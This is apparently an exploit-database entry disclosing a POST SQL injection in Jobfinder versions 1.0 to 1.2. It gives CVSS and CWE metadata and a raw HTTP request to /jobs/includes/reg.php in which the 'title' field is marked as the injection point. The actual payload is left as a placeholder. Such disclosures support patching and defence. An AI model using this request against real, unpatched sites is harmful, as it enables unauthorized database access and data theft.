vendor:
Jobfinder
by:
AtT4CKxT3rR0r1ST
8,8
CVSS
HIGH
Post Sql Injection
89
CWE
Product Name: Jobfinder
Affected Version From: 1.0
Affected Version To: 1.2
Patch Exists: YES
Related CWE: CVE-2013-4456
CPE: a:jobfinder:jobfinder
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2013
Jobsite logo – Multiple Vulnerabilties
Note: enter the registration page[register.php] and register there, then take the post code. POST /jobs/includes/reg.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/jobs/register.php Cookie: Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 122 title=[SQL INJECTION]&firstname=&middlename=&lastname=&address=&city=&user=&user_password=&user_password2=&email=
Mitigation:
Input validation and sanitization